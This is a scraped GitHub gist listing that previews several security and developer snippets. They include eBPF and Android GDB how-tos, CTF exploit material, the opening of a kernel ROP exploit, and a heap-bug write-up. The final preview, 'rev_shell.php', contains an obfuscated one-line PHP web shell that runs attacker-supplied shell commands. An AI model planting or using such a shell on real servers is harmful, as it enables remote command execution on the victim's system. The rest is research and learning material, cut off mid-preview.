💭
STATUS: broken

echel0n echel0nn

  • Black Mesa Research Facility
@cbare
cbare / test_requests_redirect.py
Created December 19, 2012 00:05
Show how to follow redirects, including rePOSTing, with the python requests library.
## follow redirects, including rePOSTing, with the requests library.
######################################################################
import requests
## authentication with no redirects
ans = requests.post(url=endp_prod + "/session", data=json.dumps(d), headers=h)
## results in a successful login
ans.status_code
@jthuraisamy
jthuraisamy / windows-toolkit.md
Last active April 12, 2022 20:00
Windows Toolkit


Binary

Native Binaries

IDA Plugins Preferred Neutral Unreviewed
@lizrice
lizrice / hello_map.py
Last active July 19, 2023 08:20
eBPF hello world
#!/usr/bin/python
from bcc import BPF
from time import sleep
# This outputs a count of how many times the clone and execve syscalls have been made
# showing the use of an eBPF map (called syscall).
program = """
BPF_HASH(syscall);
@sekkr1
sekkr1 / android_gdb.md
Created August 12, 2019 15:27
Attaching GDB to Android apps' native libraries

How to GDB android native libraries

[1] Install NDK from android studio

[2] Push appropriate gdb-server to phone

adb push ~/android-sdk-linux/ndk-bundle/prebuilt/android-<arch>/gdbserver/gdbserver /data/local/tmp
adb shell "chmod 777 /data/local/tmp/gdbserver"
adb shell "ls -l /data/local/tmp/gdbserver"

[4] Forward ports

adb forward tcp:1337 tcp:1337

@shinh
shinh / gen_el_lua_py2_jvm.rb
Last active December 26, 2020 18:15
bytecode polyglot - def con qual 2020 bytecoooding
#!/usr/bin/env ruby
# elisp, lua, python2, and jvm
# https://docs.google.com/spreadsheets/d/1l1N_wtK8xA7N-ezG5iUjDeg6iKQgVaYf8ckTSp30QIo/
$flag = File.read('flag').chomp
$ml_preamble = nil
$lua_preamble = nil
$ruby_preamble = nil
@n4sm
n4sm / exploit.c
Last active August 19, 2021 12:24
Kernel Exploitation - ROP bypass KPTI / smep
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <assert.h>
#include <sys/ioctl.h>

Functionality

At the beginning, the binary lets you enter 0x20 bytes for your name. This is stored in the bss section, and it is not null terminated. After this, you get the following menu options:

  1. Show Name - Shows you your name
  2. Write Diary - Lets you allocate a page with a max size of 0x80. The first four bytes of this page chunk store the size you choose, and the rest is the content you enter. calloc is used to allocate this chunk. The chunk's pointer is stored in an array immediately after your name in the bss section (meaning the name can be aligned to it and you can leak it using option 1). You can have a max of 14 pages.
  3. Read Diary - Lets you pick a page index, and the corresponding page contents are output to you (using puts).
  4. Edit Diary - Lets you pick a page index to edit. It will use the size stored in the first 4 bytes of the page chunk to determine how many bytes you can edit. The page index you enter is signed, so there is a bug here (you can enter negative
@0xSojalSec
0xSojalSec / rev_shell.php
Created January 28, 2023 18:46 — forked from terjanq/rev_shell.php
The shortest non-alphanumeric reverse shell script (19 bytes)
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;
/*
* In terminal:
* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
* This is how the code will be produced, \xa0\xb8\xba\xab will be
* treated as constant therefore no " needed. It is also not copyable
* string because of non-ascii characters
*
* Explanation: